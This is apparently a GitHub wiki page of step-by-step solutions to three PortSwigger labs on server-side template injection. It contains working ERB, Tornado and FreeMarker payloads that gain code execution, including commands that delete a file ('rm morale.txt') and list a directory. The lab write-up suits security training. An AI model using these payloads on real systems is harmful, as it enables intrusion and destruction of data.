Server side template injection (SSTI) - gachikuku/portswigger GitHub Wiki
Practitioner lab:
Basic server-side template injection
Practitioner lab:
Basic server-side template injection
-
Solution
- View products, notice first product displays,
Unfortunately this product is out of stock. - Notice also the URL reflects that,
https://uuid.web-security-academy.net/?message=Unfortunately%20this%20product%20is%20out%20of%20stock. - Since lab description says it's an ERB template, payloads can be found in HackTricks ERB (Ruby) section.
- After testing with
<%= 7*7 %> = 49, RCE can be achieved deletingmorale.txtfile like so.https://uuid.web-security-academy.net/?message=<%= system("rm morale.txt") %>
- View products, notice first product displays,
Practitioner lab:
Basic server-side template injection (code context)
Practitioner lab:
Basic server-side template injection (code context)
-
Solution
- Log in as
wiener:peter. - Use "preferred name" functionality.
- Make a comment.
- Notice "preferred name" is reflected at;
https://uuid.web-security-academy.net/post?postId=<postnumber>. - Change
POSTrequest to test for SSTI Tornado syntax.blog-post-author-display: {{7*7}} - RCE to delete
morale.txt. (Payload is ChatGPT generated from Bug Hunter plugin.){{__import__('os').popen('rm morale.txt').read()}}
- Log in as
Practitioner labhttps://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-using-documentation:
Server-side template injection using documentation
Practitioner labhttps://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-using-documentation:
Server-side template injection using documentation
-
Solution
- Log in with credentials.
- Modify a post.
- Generate an error, and take note of the framework used (this is case "freemarker").
- use HackTricks for freemarker to craft a payload.
- payload
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("ls")}